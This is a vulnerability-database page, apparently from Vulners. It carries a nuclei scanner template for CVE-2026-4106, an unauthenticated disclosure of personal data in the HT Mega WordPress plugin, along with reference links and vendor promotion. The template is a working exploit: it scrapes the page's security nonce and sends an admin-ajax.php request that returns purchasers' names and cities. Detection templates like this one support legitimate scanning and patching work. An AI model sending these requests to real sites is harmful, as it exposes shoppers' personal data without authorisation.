Lucene search
K

HT Mega < 3.0.7 - Sensitive Information Disclosure

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

HT Mega plugin for WordPress below 3.0.7 leaks sensitive data via AJAX by extracting security nonce.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-4106
23 Apr 202606:00
attackerkb
GithubExploit
Exploit for CVE-2026-4106
12 Apr 202600:26
githubexploit
Circl
CVE-2026-4106
12 Apr 202601:00
circl
CNNVD
WordPress plugin HT Mega Addons for Elementor 信息泄露漏洞
23 Apr 202600:00
cnnvd
CVE
CVE-2026-4106
23 Apr 202606:00
cve
Cvelist
CVE-2026-4106 HT Mega < 3.0.7 – Unauthenticated PII Disclosure
23 Apr 202606:00
cvelist
EUVD
EUVD-2026-25196
23 Apr 202609:32
euvd
NVD
CVE-2026-4106
23 Apr 202607:16
nvd
Patchstack
WordPress HT Mega plugin < 3.0.7 - Unauthenticated PII Disclosure vulnerability
24 Apr 202609:00
patchstack
Positive Technologies
PT-2026-32365
13 Apr 202600:00
ptsecurity
Rows per page
id: CVE-2026-4106

info:
  name: HT Mega < 3.0.7 - Sensitive Information Disclosure
  author: EFETR
  severity: high
  description: |
    The HT Mega plugin for WordPress is vulnerable to Sensitive Information Exposure via AJAX actions. This template dynamically extracts the security nonce before exploitation.
  reference:
    - https://wpscan.com/vulnerability/9477ead2-3990-4aae-8e66-09ee2f4daa3e/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-4106
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-4106
    epss-score: 0.00742
    epss-percentile: 0.50223
  metadata:
    max-request: 2
    verified: true
    vendor: hastech
    product: ht-mega-for-elementor
    framework: wordpress
    publicwww-query: "/plugins/ht-mega-for-elementor/"
  tags: cve,cve2026,wordpress,wp-plugin,ht-mega-for-elementor,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: extracted_nonce
        part: body
        group: 1
        regex:
          - 'security["'':\s]+([a-f0-9]{10})'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wcsales_purchased_products&security={{extracted_nonce}}&limit=10

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"buyer":'
          - '"fname":'
          - '"city":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100853c516ba9472221b97f5373dfba8b2bdc06722501f40b278a11054a9cb8f278022100e34f5d959e11854c6f3add3d4eece84e2848193c3c709252900d956721fc5ec9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Apr 2026 02:46Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00742
SSVC
12